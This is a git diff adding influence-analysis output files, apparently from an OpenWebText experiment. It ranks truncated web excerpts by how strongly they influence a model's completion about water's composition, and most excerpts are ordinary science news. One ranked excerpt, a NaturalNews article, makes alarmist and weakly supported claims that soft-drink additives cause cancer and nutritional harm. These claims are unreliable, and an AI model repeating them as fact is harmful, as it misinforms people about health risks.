"aggregate_train_gradients": false, + "use_measurement_for_self_influence": false, + "query_gradient_svd_dtype": "torch.float32", + "per_sample_gradient_dtype": "torch.float32", + "precondition_dtype": "torch.float32", + "score_dtype": "torch.bfloat16" +} \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/train_dataset_metadata.json b/examples/openwebtext/files/scores_raw_margin/train_dataset_metadata.json new file mode 100644 index 0000000..537ded9 --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/train_dataset_metadata.json @@ -0,0 +1,5 @@ +{ + "type": "Dataset", + "dataset_size": 100000, + "indices": null +} \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/water.txt b/examples/openwebtext/files/scores_raw_margin/water.txt new file mode 100644 index 0000000..b2614f1 --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/water.txt @@ -0,0 +1,1970 @@ +Query Sequence: +Prompt:Water is composed of; Completion: hydrogen and oxygen atoms. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 6848512.0 +<|begin_of_text|>[/caption] + +Last week, scientists announced findings based on data from the SPICAM spectrometer onboard ESA’s Mars Express spacecraft. The findings reported in Science by Maltagliati et al (2011), reveal that the Martian atmosphere is supersaturated with water vapor. According to the research team, the discovery provides new information which will help scientists better understand the water cycle and atmospheric history of Mars. + +What processes are at work to allow large amounts of water vapor in the Martian atmosphere? + +The animated sequence to the left shows the water cycle of the Martian atmosphere in action: + +When the polar caps of Mars (which contain frozen Water and CO 2 ) are warmed by the Sun during spring and summer, the water sublimates and is released into the atmosphere. + +Atmospheric winds transport the water vapor molecules to higher altitudes. When the water molecules combine with dust molecules, clouds are formed. If there isn’t much dust in the atmosphere, the rate of condensation is reduced, which leaves water vapor in the atmosphere, creating a supersaturated state. + +Water vapor may also be transported by wind to the southern hemisphere or may be carried high in the atmosphere.In the upper atmosphere the water vapor can be affected by photodissociation in which solar radiation (white arrows) splits the water molecules into hydrogen and oxygen atoms, which then escape into space. + +Scientists had generally assumed that supersaturation cannot exist in the cold Martian atmosphere, believing that any water vapor in excess of saturation instantly froze. Data from SPICAM revealed that supersaturation takes place at altitudes of up to 50 km above the surface when Mars is at its farthest point from the Sun. + +Based on the SPICAM data, scientists have learned that there is more water vapor in the Martian atmosphere than previously believed. While the amount of water in Mars’ atmosphere is about 10,000 times less water vapor than that of Earth, previous models have underestimated the amount of water in the Martian atmosphere at altitudes of 20-50km, as the data suggests 10 to 100 times more water than expected at said altitudes. + +“The vertical distribution of water vapour is a key factor in the study of Mars’ hydrological cycle, and the old paradigm that it is mainly controlled by saturation physics now needs to be revised,” said Luca Maltagliati, one of the authors of the paper. “Our finding has major implications for understanding the planet’s global climate and the transport of water from one hemisphere to the other.” + +“The data suggest that much more water +================================================================================ +Rank = 1; Score = 5537792.0 +<|begin_of_text|>Our world is made of elements and combinations of elements called compounds. An element is a pure substance made of atoms that are all of the same type. At present, 116 elements are known, and only about 90 of these occur naturally. + +Elements and the ‘Big Bang’ theory + +During the formation of the universe some 14 billion years ago in the so-called ‘Big Bang’, only the lightest elements were formed – hydrogen and helium along with trace amounts of lithium and beryllium. As the cloud of cosmic dust and gases from the Big Bang cooled, stars formed, and these then grouped together to form galaxies. + +The other 86 elements found in nature were created in nuclear reactions in these stars and in huge stellar explosions known as supernovae. + +Elements and our Sun + +For most of their lives, stars fuse elemental hydrogen into helium in their cores. Two atoms of hydrogen are combined in a series of steps to create helium-4. These reactions account for 85% of the Sun’s energy. The remaining 15% comes from reactions that produce the elements beryllium and lithium. + +The energy from these nuclear reactions is emitted in various forms of radiation such as ultraviolet light, X-rays, visible light, infrared rays, microwaves and radio waves. In addition, energised particles such as neutrinos and protons are released, and it is these that make up the solar wind. + +Earth is in the path of this energy stream, which warms the planet, drives weather and provides energy for life. The Earth’s atmosphere is able to screen out most of the harmful radiation, and the Earth’s magnetic field can deflect the harmful effects of the solar wind. + +Dying stars + +When a star’s core runs out of hydrogen, the star begins to die out. The dying star expands into a red giant, and this now begins to manufacture carbon atoms by fusing helium atoms. + +More massive stars begin a further series of nuclear burning or reaction stages. The elements formed in these stages range from oxygen through to iron. + +During a supernova, the star releases very large amounts of energy as well as neutrons, which allows elements heavier than iron, such as uranium and gold, to be produced. In the supernova explosion, all of these elements are expelled out into space. + +Our world is literally made up of elements formed deep within the cores of stars now long dead. As Britain’s Astronomer Royal Sir Martin Rees said, “We are literally the ashes of long dead stars.” When you buy a +================================================================================ +Rank = 2; Score = 3964928.0 +<|begin_of_text|>Spiders sprayed with a thin layer of graphene and carbon nanotubes have produced super-strong webs with record-beating properties. + +Combining one of the strongest natural materials with one of the strongest artificial materials, researchers at the University of Trento in Italy created what they describe as "super silk". + +"The protein matrix and hard tissues of insects, worms, ants and spiders naturally incorporates metals, such as zinc, manganese and copper," the study states. "This leads to mechanical hardening of teeth, jaws, mandibles, ovipositors and to an enhancement of silk toughness. + +What is graphene? Graphene is a one-atom-thick material made of carbon atoms arranged in a honeycomb lattice that is 200-times stronger than steel, more conductive than copper and as flexible as rubber. It has been touted as a "wonder material" by scientists for its remarkable properties and vast range of uses, which include everything from flexible smartphone screens to artificial retinas. + +"Thus, the artificial incorporation of metals, or even insulating or semiconducting materials, into these protein structures could be exploited to obtain a reinforced matrix." + +The silk created by the graphene-coated spiders is 3.5 times tougher than that of the giant riverine orb spider - the strongest silk known to nature. + +The process that leads to the graphene and carbon nanotubes being infused in the silk is still not clear to the researchers, though the principle theory is that spiders make use of materials found within their immediate environments when spinning silk. + +Nicola Pugno, the lead researcher in the study, believes that the strength of the material produced is the highest reported to date, even when compared to high performance fibres like kevlar or the current toughest knotted fibres. + +The researchers hope that similar techniques in the future can be used to create a new class of bionic materials and have suggested that one potential application could be to create a giant net capable of catching falling aircraft. + +"This approach could be extended to other animals and plants and could lead to a new class of bionic materials for ultimate applications," Pugno said. + +"This concept could become a way to obtain materials with superior characteristics."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 3; Score = 3883008.0 +<|begin_of_text|>There may be enough oxygen in the waters of Jupiter's moon Europa to support millions of tons worth of fish, according to a new study. And while nobody is suggesting there might actually be fish on Europa, this finding suggests the Jovian satellite could be capable of supporting the kinds of life familiar to us here on Earth, if only in microbial form. + +Europa, which is roughly the size of Earth's moon, is enveloped by a global ocean about 100 miles deep (160 km), with an icy crust that may be only a few miles thick. From what we know of Earth, where there is water, there is a chance at life, so for many years scientists have speculated that this Jovian moon could support extraterrestrials. + +As we learned more about Jupiter's effect on its moons, the possibility for life on Europa grew even more likely. Studies showed the moon could have enough oxygen to support the kind of life we are most familiar with on Earth. + +IN PICTURES: Jupiter + +The ice on the surface, like all water, is made from hydrogen and oxygen, and the constant stream of radiation pouring in from Jupiter reacts with this ice to form free oxygen and other oxidants such as hydrogen peroxide. The reactivity of oxygen is key to generating the energy that helped multi-cellular life flourish on our planet. + +Still, researchers had thought there was no effective method for delivering any of this oxygen-rich matter into Europa's ocean. Scientists had assumed the primary way for surface materials to migrate downward was from the impacts it would suffer from cosmic debris, which regularly bombards everything in our solar system. [Photos of Jupiter's moons.] + +However, past calculations suggested that even after a few billion years, such "impact gardening" would never lead to an oxygenated layer more than some 33 feet (10 meters) deep into the ice shell, nowhere far enough down to reach the underlying ocean. + +However, the new study suggests this oxygen-rich layer could be far thicker than before thought, potentially encompassing the entire crust. The key is looking at other ways to stir Europa's crust, explained researcher Richard Greenberg, a planetary scientist at the University of Arizona's Lunar and Planetary Laboratory at Tucson. + +The gravitational pull Europa experiences from Jupiter leads to tidal forces roughly 1,000 times stronger than what Earth feels from our moon, flexing and heating Europa and making it very active geologically. This could explain why its surface appears no older than 50 million years old — its surface underwent complete turnover in that time +================================================================================ +Rank = 4; Score = 3194880.0 +<|begin_of_text|>Something strange happens on the Moon for 5 days during every lunar cycle. Its surface becomes electrically charged. Dust kicks up suddenly. It might even swirl into a light “storm” as particles electrically repel each other. + +These are the 5 days when the Moon’s orbit crosses Earth’s magnetotail, the vast region of the planet’s magnetosphere that gets swept back by solar wind. Within the magnetotail is a structure called the plasma sheet, a layer with a weaker magnetic field that’s relatively thick with ions. + +“Our new finding suggests that the Earth-Moon system coevolves not only physically but also chemically.” Now results from Japan’s Selenological and Engineering Explorer (SELENE) lunar orbiter show that during this time when the Moon passes through Earth’s plasma sheet, significant amounts of terrestrial oxygen from Earth rain down onto the Moon’s surface. This has likely been going on since oxygen became abundant in Earth’s atmosphere some 3 billion years ago. + +“Our new finding suggests that the Earth-Moon system coevolves not only physically but also chemically,” said Kentaro Terada, lead author on the study and planetary scientist at Osaka University in Japan. The research, published today in Nature Astronomy, hints that someday Moon dust could help scientists study Earth’s ancient atmosphere. + +Solar Versus Terrestrial Oxygen + +Solar wind, the collective stream of highly energetic particles that hurtle from the Sun, constantly batters Earth’s magnetosphere, shaping it into its characteristic teardrop form. Behind Earth, the magnetotail extends more than 600,000 kilometers. + +While Earth gets buffeted by solar wind, some particles—including hydrogen and oxygen ions stripped of electrons—escape along Earth’s magnetic field lines into the plasma sheet. For a brief period during every lunar orbit, the Moon passes through the plasma sheet, where it’s exposed to these ionized particles of terrestrial origin. + +But do these particles—in particular, oxygen ions—make it to the lunar surface, and if so, how would we know? Thus far, it’s been “an enigma,” Terada said. After all, oxygen carried on the solar wind also arrives at the Moon after it orbits out of Earth’s magnetotail. + +Researchers decided to look at data from SELENE, nicknamed Kaguya, to see if they could pick up signs of terrestrial oxygen in the days when the Moon passed through Earth’s magnetotail. Data from Kayuga, which stopped collecting observations in 2010, revealed that during a few hours every month +================================================================================ +Rank = 5; Score = 3145728.0 +<|begin_of_text|>Today’s post looks at an aspect of chemistry we come across every day: alloys. Alloys make up parts of buildings, transport, coins, and plenty of other objects in our daily lives. But what are the different alloys we use made up of, and why do we use them instead of elemental metals? The graphic answers the first of these questions, and in the post we’ll try and answer the second. + +First, a little on what alloys are, for anyone unfamiliar with the term. Alloys are a mixture of elements, where at least one of the elements is a metal. There are over 80 metals in the periodic table of elements, and we can mix selections of these different metals in varying proportions, sometimes with non-metals too, to create alloys. Note the use of the word mixture: in the vast majority of cases, alloys are simply intermixed elements, rather than elements that are chemically bonded together. + +Alloys can be simply classified in terms of their atomic arrangements. In cases where the two elements being mixed to make the alloy have similar atom sizes, atoms of the second element can simply take the place of atoms of the first element in the structure. These types of alloys are called substitution alloys. On the other hand, if the atoms of the second element are much smaller, they can slot into the gaps between atoms of the first element. These alloys are known as interstitial alloys. Alloys can be made in a number of ways, but they are primarily fashioned by mixing together the molten components. + +There are a great range of alloys; the main graphic illustrates just a small selection of those that we use in a range of applications. But why use them in the first place when there are so many different metals with varying properties in the periodic table? Whilst metallic elements may have desirable properties, unfortunately they rarely have them in convenient combinations. Gold is shiny and, well, golden, but it’s also quite soft, meaning if you try and make a ring from pure gold, it’ll deform easily. Iron is present in many buildings, but on its own it too is a little on the soft side, and also has a tendency to rust when exposed to damp air. + +Making alloys is essentially a way for us to ‘tweak’ the properties of a metal, to make them closer to the ideal properties we want for a particular purpose. Alloying gold with copper or silver makes it harder, whilst alloying iron with carbon and a selection of other metals accomplishes a similar effect, and also helps prevent it +================================================================================ +Rank = 6; Score = 3096576.0 +<|begin_of_text|>Toxic effects of breathing in oxygen at high concentrations + +Oxygen toxicity Synonyms Oxygen toxicity syndrome, oxygen intoxication, oxygen poisoning In 1942–43 the UK Government carried out extensive testing for oxygen toxicity in divers. The chamber is pressurised with air to 3.7 bar. The subject in the centre is breathing 100% oxygen from a mask. Specialty Emergency medicine + +Oxygen toxicity is a condition resulting from the harmful effects of breathing molecular oxygen (O + +2 ) at increased partial pressures. Severe cases can result in cell damage and death, with effects most often seen in the central nervous system, lungs, and eyes. Historically, the central nervous system condition was called the Paul Bert effect, and the pulmonary condition the Lorrain Smith effect, after the researchers who pioneered the discoveries and descriptions in the late 19th century. Oxygen toxicity is a concern for underwater divers, those on high concentrations of supplemental oxygen (particularly premature babies), and those undergoing hyperbaric oxygen therapy. + +The result of breathing increased partial pressures of oxygen is hyperoxia, an excess of oxygen in body tissues. The body is affected in different ways depending on the type of exposure. Central nervous system toxicity is caused by short exposure to high partial pressures of oxygen at greater than atmospheric pressure. Pulmonary and ocular toxicity result from longer exposure to increased oxygen levels at normal pressure. Symptoms may include disorientation, breathing problems, and vision changes such as myopia. Prolonged exposure to above-normal oxygen partial pressures, or shorter exposures to very high partial pressures, can cause oxidative damage to cell membranes, collapse of the alveoli in the lungs, retinal detachment, and seizures. Oxygen toxicity is managed by reducing the exposure to increased oxygen levels. Studies show that, in the long term, a robust recovery from most types of oxygen toxicity is possible. + +Protocols for avoidance of the effects of hyperoxia exist in fields where oxygen is breathed at higher-than-normal partial pressures, including underwater diving using compressed breathing gases, hyperbaric medicine, neonatal care and human spaceflight. These protocols have resulted in the increasing rarity of seizures due to oxygen toxicity, with pulmonary and ocular damage being mainly confined to the problems of managing premature infants. + +In recent years, oxygen has become available for recreational use in oxygen bars. The US Food and Drug Administration has warned those suffering from problems such as heart or lung disease not to use oxygen bars. Scuba divers use breathing gases containing up to 100% oxygen, and should have specific +================================================================================ +Rank = 7; Score = 2899968.0 +<|begin_of_text|>For the very first time, a NASA spacecraft has detected matter from outside our solar system — material that came from elsewhere in the galaxy.. + +This so-called interstellar material was spotted by NASA's Interstellar Boundary Explorer (IBEX), a spacecraft that is studying the edge of the solar system from its orbit about 200,000 miles (322,000 kilometers) above Earth. + +"This alien interstellar material is really the stuff that stars and planets and people are made of — it's really important to be measuring it," David McComas, IBEX principal investigator and assistant vice president of the Space Science and Engineering Division at Southwest Research Institute in San Antonio, said in a news briefing from NASA Headquarters in Washington, D.C. + +An international team of scientists presented new findings from IBEX, which included the first detection of alien particles of hydrogen, oxygen and neon, in addition to the confirmation of previously detected helium. [Images from NASA's IBEX Mission] + +These atoms are remnants of older stars that have ended their lives in violent explosions, called supernovas, which dispersed the elements throughout the galaxy. As interstellar wind blows these charged and neutral particles through the Milky Way, the IBEX probe is able to create a census of the elements that are present. + +Heavy elements in space + +According to the new study, the researchers found 74 oxygen atoms for every 20 neon atoms in the interstellar wind. For comparison, there are 111 oxygen atoms for every 20 neon atoms in our solar system, meaning there are more oxygen atoms in any part of the solar system than in nearby interstellar space, the scientists said in a statement. + +"These are important elements to know quantitatively because they are the building blocks of stars, planets, people," McComas said. "We discovered this puzzle: matter outside our solar system doesn't look like material inside our solar system. It seems to be deficient in oxygen compared to neon." + +The presence of less oxygen within interstellar material could indicate that the sun formed in a region with less oxygen compared to its current location, the researchers said. + +Or, it could be a sign that oxygen is "locked up" in other galactic materials, such as cosmic grains of dust or ice. [Top 10 Strangest Things in Space] + +"That leaves us with a puzzle for now: could it be that some of that oxygen, which is so crucial for life on Earth, is locked up in the cosmic dust?" asked Eberhard Möbius, a professor at the University of New Hampshire and +================================================================================ +Rank = 8; Score = 2588672.0 +<|begin_of_text|>[+]Enlarge Debris littered a lab bench after the explosion. Credit: Honolulu Fire Department + +An explosion last month that caused a University of Hawaii, Manoa, postdoctoral researcher to lose an arm was caused by a spark from a digital pressure gauge that was not designed for use with flammable gases, says a Honolulu Fire Department investigation report. + +Thea Ekins-Coward was combining hydrogen, carbon dioxide, and oxygen gases from high-pressure cylinders into a lower pressure tank when the incident occurred. She has not given the university permission to release information about her condition, said spokesman Daniel Meisenzahl at an April 18 press conference. + +The gas mixture was “food” for bacteria being used to produce biofuels and bioplastics. Ekins-Coward was working for the Hawaii Natural Energy Institute under researcher Jian Yu. A 2013 paper by Yu indicates a set-up in which gases are plumbed through a mixing device called a gas proportioner directly into the bioreactor (Int. J. Hydrogen Energy 2013, DOI: 10.1016/j.ijhydene.2013.04.153). The gas gauge identified in the paper is an “intrinsically safe” model designed to prevent ignition. + +But after Ekins-Coward started in the lab last fall, she purchased a 49-L steel gas tank, a different gauge not rated as intrinsically safe, a pressure-relief valve, and fittings, and she put them together, Yu and Ekins-Coward told fire department investigators, according to the report. Ekins-Coward would add the gases to the portable tank, which would then be connected to the bioreactor. She was using a mixture of 70% hydrogen, 25% oxygen, and 5% carbon dioxide for her experiments, the report says. + +In the week before the incident, a similar set-up with a 3.8-L tank resulted in a “small internal explosion” when Ekins-Coward pressed the off button on the gauge, the fire department report says. She also occasionally experienced static shocks when touching the tank, which was not grounded. She reported the shocks and possibly the small explosion to Yu, who told her not to worry about it, the report says. + +On the day of the incident, the 49-L tank exploded when Ekins-Coward pressed the off button on the gauge. “She did not lose consciousness or hit her head; she was aware that she lost her arm in the explosion,” the report +================================================================================ +Rank = 9; Score = 2588672.0 +<|begin_of_text|>Wood gas is a syngas fuel which can be used as a fuel for furnaces, stoves and vehicles in place of gasoline, diesel or other fuels. During the production process biomass or other carbon-containing materials are gasified within the oxygen-limited environment of a wood gas generator to produce hydrogen and carbon monoxide. These gases can then be burnt as a fuel within an oxygen rich environment to produce carbon dioxide, water and heat. In some gasifiers this process is preceded by pyrolysis, where the biomass or coal is first converted to char, releasing methane and tar rich in polycyclic aromatic hydrocarbons. + +History [ edit ] + +A bus, powered by wood gas generated by a gassifier on a trailer, Leeds, England c.1943 + +The first wood gasifier was apparently built by Gustav Bischof in 1839. The first vehicle powered by wood gas was built by Thomas Hugh Parker in 1901.[1] Around 1900, many cities delivered syngas (centrally produced, typically from coal) to residences. Natural gas began to be used only in 1930. + +Wood gas vehicles were used during World War II as a consequence of the rationing of fossil fuels. In Germany alone, around 500,000 "producer gas" vehicles were in use at the end of the war. Trucks, buses, tractors, motorcycles, ships and trains were equipped with a wood gasification unit. In 1942, when wood gas had not yet reached the height of its popularity, there were about 73,000 wood gas vehicles in Sweden,[2] 65,000 in France, 10,000 in Denmark, and almost 8,000 in Switzerland. In 1944, Finland had 43,000 "woodmobiles", of which 30,000 were buses and trucks, 7,000 private vehicles, 4,000 tractors and 600 boats.[3] + +Wood gasifiers are still manufactured in China and Russia for automobiles and as power generators for industrial applications. Trucks retrofitted with wood gasifiers are used in North Korea[4] in rural areas, particularly on the roads of the east coast. + +Usage [ edit ] + +Internal combustion engine [ edit ] + +Wood gasifier system + +A wood-gas powered car, Berlin, 1946. Note the secondary radiator, required to cool the gas before it's introduced into the engine + +Wood gasifiers can power either spark ignition engines, where all of the normal fuel can +================================================================================ +Rank = 10; Score = 2441216.0 +<|begin_of_text|>As semiconductor nanowires emerge as indispensable building blocks for next-generation electronic, energy conversion, and photonic devices (i.e. solar panels, lasers), better understanding how to direct nanowire growth is vital, according to Georgia Tech researchers. + +Many orders of magnitude smaller than household wires, nanowires can be made from a variety of semiconducting materials including germanium and silicon. + +For years, the synthesis of nanowires has been somewhat mysterious, requiring scientists to experiment with reactor settings, modulating temperature and pressure, to see what would work best – a slow, arduous process of trial and error. “It’s been like cooking something in the oven without ever being able to look in until it’s done hours later,” explains Michael Filler, associate professor at Georgia Tech’s School of Chemical & Biomolecular Engineering. + +However, a team working in the Filler Laboratory has gained unprecedented insight into the nanowire growth process through the use of real-time infrared spectroscopy. They found that surface species, specifically hydrogen atoms and methyl groups, decorate the nanowire’s surface and are essential for the stable growth of nanowires made from germanium. + +According to the study’s findings, without the presence of hydrogen and methyl adsorbing (or adhering) to the nanowire sidewalls, the liquid droplet that sits atop the nanowire could slip, causing growth to cease. “These surface species, hydrogen and methyl molecules, act like a layer of Rain-X, keeping the droplet in place,” Filler explains. + +“Our work shows that without these surface adsorbates, growth doesn’t happen. No one knew that before,” says Filler, whose research team published its findings in a recent issue of the Journal of the American Chemical Society. “For as long as scientists have been using this growth method – more than five decades – we didn’t know that anything was present on the wire surface.” + +Now that the scientific community is aware of this key aspect of nanowire synthesis, researchers will be able to better design processes and precursors to choreograph nanowire growth, Filler says. As obstacles to the production of nanowires are overcome, they can be manufactured on a greater sale and incorporated into commercial products. + +“The fundamental chemical knowledge provided in our study promises to advance the rational synthetic design of nanowire structure and function,” Filler says. + +Titled “Direct Observation of Transient Surface Species during Ge Nanowire Growth and Their Influence on Growth Stability,” the study was led by +================================================================================ +Rank = 11; Score = 1933312.0 +<|begin_of_text|>BVO being replaced with sucrose acetate isobutyrate + +If you drink factory-made beverages, you are ingesting chemicals + +(NaturalNews) Coca-Cola and Pepsico have both announced they are removing brominated vegetable oil (BVO) from their beverage products following a sustained social media campaign that protested the practice. Brominated vegetable oil is a flame retardant, and it's usually made from genetically modified corn or soy derivatives bonded with a bromine atom., just like fluoride and chlorine (they're all in the same column on the Table of Elements). They can also interfere with iodine absorption by the thyroid, breast tissue and prostate tissue, causing nutritional deficiencies which can promote cancer.If you've been drinking Mountain Dew, Gatorade, Fanta or other similar beverages made by Coke or Pepsi, you've been drinking brominated vegetable oil.The 'net is loudly applauding the removal of BVO in these beverages, but almost no one seems to be aware of what they're replacing it with: sucrose acetate isobutyrate.The idea of removing all synthetic chemicals from their products has apparently never occurred to Coke and Pepsi. Their products, after all, are full of artificial sweeteners and other chemicals, and it turns out they need to useto prevent all their chemical ingredients from separating.So now they're turning to(SAIB), a chemical we would all hope is safer than BVO. But one study published infound that dogs fed this chemical showed enlarged livers and altered liver enzyme function: (1)Sucrose acetate isobutyrate is produced by the Eastman Chemical Company (2), which describes the chemical as a "weighting agent or flavor emulsion stabilizer to prevent separation of essential citrus oils. It is also used as a fragrance fixative and to provide transfer resistance in lipstick."Scientific studies show that sucrose acetate isobutyrate, when ingested by humans, is largely, indicating that the chemical enters the blood supply upon being ingested orally and then makes its way to the lungs. (3)The bottom line in this story? Even when companies like Coca-Cola and Pepsi are forced by public pressure to remove a toxic chemical in their products, they simply replace it with another synthetic chemical. Either way, you're still drinking synthetic chemicals.The fact that consumers drink Gatorade at all is a sad commentary on the decline of modern civilization and the horrific state of the toxic food supply. Instead of drinking fresh, raw juices that provide plant-based nutrients, millions of people drink synthetic +================================================================================ +Rank = 12; Score = 1875968.0 +<|begin_of_text|>Steven McCloskey, co-founder of a new virtual reality startup, manipulates objects in an immersive environment. + +Virtual reality (VR) headsets such as the Oculus Rift will line store shelves this holiday season, and UC San Diego alumni startup Nanome, Inc. plans to capitalize on that by creating VR apps for the consumer market, the classroom, and beyond. + +Nanome co-founder Steven McCloskey was part of the first graduating class of NanoEngineering at UC San Diego when he received his bachelor’s degree in 2015. Frustrated by the lack of tools available to nanoengineers for complex 3D modeling and simulation at the nanoscale, he set out to try and rectify the problem. He and colleagues built the first molecular visualization, modeling and simulation tool for today’s VR platforms called nano-one. The application allows users to build molecules with carbon, oxygen, nitrogen and hydrogen atoms. + +“Our goal is to provide the tools necessary to help people build new proteins and molecules and eventually also simulate their interactions,” said McCloskey. “You can see how the world works at this fundamental level, and re-make it.” + +Why VR? Everything is made out of atoms—cosmetics, computer hardware, everything. Take a chair, for example. A chair can’t just look like a chair, it has to act like one. If you’re going to be manipulating things in 3D, you also need to be able to change the material properties of an object, which is dictated by structures at the nanoscale level. + +McCloskey said he believes nanoscale virtual reality represents the future of engineering. + +“UC San Diego is where this has to happen—we have a NanoEngineering department, VR experts, Protein Databank, interdisciplinary researchers, and we’re located in Biotech Beach,” he said. + +Nano-one is now being tested in the UC San Diego Chemistry Department and in the consumer market for workflow integration, modeling precision, and optimal pattern-recognition and discovery. + +As nano-one was being developed, McCloskey and his colleagues had an idea for another VR tool that would help engineers with math. + +“When I was in Vector Calculus as a NanoEngineering major, I wanted better 3D graphics to go along with the instruction,” said McCloskey. + +Nanome co-founders Steven McCloskey and Keita Funakawa + +The team piloted a VR 3D-graphing calculator in Math20E over the summer. The calculator, called Calcflow, features intuitive ways for +================================================================================ +Rank = 13; Score = 1875968.0 +<|begin_of_text|>Get the Better newsletter. + +July 29, 2017, 6:35 PM GMT / Updated July 16, 2018, 1:02 AM GMT By Christina Heiser + +There’s nothing quite as synonymous with summer as the beach — and we’ve got good news for those who flock to the surf and sand as soon as work lets out on Friday afternoon. + +Research finds that spending time by the ocean is pretty good for your wellbeing. In fact, according to an analysis of English census data published in the journal Health Place, those who live by the coast report better physical and mental health than those who don’t. + +And in a study published in the Journal of Coastal Zone Management, participants who live in homes with ocean views report feeling calmer than those without them. + +So, it makes sense then that Hawaii has earned the ranking of happiest state in the U.S. by the annual Gallup poll six times since 2008, doesn’t it? + +How the Beach Boosts Your Mood + +When it comes to why, exactly, the beach gets you feeling all Zen, there are a few factors at play, says Richard Shuster, PsyD, clinical psychologist and host of The Daily Helping podcast. + +“The color blue has been found by an overwhelming amount of people to be associated with feelings of calm and peace,” says Shuster. “Staring at the ocean actually changes our brain waves’ frequency and puts us into a mild meditative state.” A study published in the American Association for the Advancement of Science’s journal even found that blue is associated with a boost of creativity. + +The smell of the ocean breeze contributes to your soothed state, which may have something to do with the negative ions in the air that you’re breathing in. + +Plus, that consistent ebbing and flowing you hear as you lie on your towel under an umbrella? “It kind of de-stimulates our brains,” says Shuster. The noises — coupled with the visuals — activate your parasympathetic nervous system, which is “responsible for slowing us down and allowing us to relax and feel more engaged,” says Sally Nazari, PsyD, owner of Chrysalis Psychological Services and host of the podcast Beyond the Couch. + +The smell of the ocean breeze also contributes to your soothed state, which may have something to do with the negative ions in the air that you’re breathing in. These oxygen atoms have an extra electron and occur in places like waterfalls and the ocean, says Shuster. A study published in the +================================================================================ +Rank = 14; Score = 1761280.0 +<|begin_of_text|>It starts with a simple molecule -- two atoms of hydrogen linked to one atom of oxygen -- and grows exponentially. From a tear, a pint, and a snowflake to a rivulet, a pond and a lake. From a gallon, a tide pool, and an estuary to a glacier, a bay and a cloud. + +Water accounts for nearly 57 percent of an adult male's body weight. Nearly 70 percent of our planet's surface is covered in water. Unimaginable numbers of water molecules travel the earth via the ebbs and flows of tides, the acceleration of eddies and whirlpools and the dynamic surges of currents and floods, torrents and tsunamis. + +Some 1200 years after it disappeared beneath the surface of the Mediterranean Sea, the ancient Egyptian city of Heracleion was recently discovered by archaeologist Frank Goddo and a team from the European Institute of Underwater Archaeology. + +Meanwhile, as islands in the Indian Ocean and Pacific Ocean start to disappear and scientists use computer modeling to imagine the impact of rising sea levels on coastal cities, a picture is still worth a thousand words. The following slide show by Nickolay Lamm imagines what familiar locations might look like in 2100, 2300 and 2600: + +Hurricanes Katrina and Sandy showed the devastation that can be wrought by a storm surge. This footage of the tsunami that followed the March 2011 Tohoku earthquake off the northeastern coast of Japan offers stunning visuals of the power unleashed by vast volumes of water gathering momentum. + +Man has always had a love-hate relationship with salt water. While the fish it contains can provide seemingly endless amounts of nutrition -- and a sailing vessel caught in a doldrum can remain becalmed for days on end -- a tsunami like the one that struck the Indian Ocean in 2004 can kill nearly a quarter of a million people. + +How curious then, that San Francisco's recent DocFest should feature three documentaries (each with a different length and theme) which investigate man's relationship with the salt water in his life. + +* * * * * * * * * * + +J. Christian Jensen's charming short film, Between Land and Sea, chronicles the experience of a newly-married couple, Peter and Dina, who spent two years as the hosts of a combination lighthouse/bed-and-breakfast inn on a tiny island near the Richmond-San Rafael Bridge With stunning vistas of San Francisco, the work required to give visitors the fantasy vacation they desire can still be +================================================================================ +Rank = 15; Score = 1703936.0 +<|begin_of_text|>Today’s Wonder of the Day was inspired by Drusilla. Drusilla Wonders, “does salt water freeze” Thanks for WONDERing with us, Drusilla! + +Isn't ice WONDERful? On a hot day, nothing goes down quite as well as lemonade poured over a glass full of ice cubes. In fact, ice makes so many things better. For example, we love to use ice to make homemade ice cream! + +When Old Man Winter comes calling, falling temperatures can turn creeks, lakes, ponds, and even rivers into frozen rinks you can skate on. But what about the ocean? If you've ever been to the ocean in the winter, you've probably noticed that it doesn't freeze like a small pond might. + +So does the ocean ever freeze? If you've seen pictures of the North Pole or the South Pole, you know that there are polar ice caps in those places. If the ocean freezes in those areas, why doesn't the rest of the ocean freeze during the winter? + +The freezing point of freshwater is 0° Celsius or 32° Fahrenheit. The presence of salt in water, though, reduces the freezing point of water. The more salt in the water, the lower the freezing point will be. + +When freshwater freezes, water molecules of hydrogen and oxygen have bonded together into a crystalline structure of ice. The presence of salt makes it harder for water molecules to bond to the ice structure, because ice naturally repels salt molecules. So in a sense, the salt gets in the way of water molecules, blocking them from joining the ice. The salt also bumps into the ice, knocking water molecules off of the structure -- and that's how salt melts ice. + +When salt molecules displace water molecules, the freezing rate slows down. This is why salt is often used on icy roads to slow down freezing and make them safer to travel upon. + +Although the saltiness of ocean water varies, often ocean water has about 35 grams of salt for every 1,000 units of water. This lowers the freezing point of ocean water to about -1.8° C or 28.8° F. So ocean water will freeze. It just needs to reach a lower temperature. + +Another factor that affects the freezing of ocean water is its movement. Unlike ponds, ocean waves move around constantly. This helps ocean water retain heat. As a result, only really cold areas, such as the North Pole or South Pole, usually get cold enough for ocean water to freeze. + +When ocean water +================================================================================ +Rank = 16; Score = 1622016.0 +<|begin_of_text|>The dark color of the region is speculated to 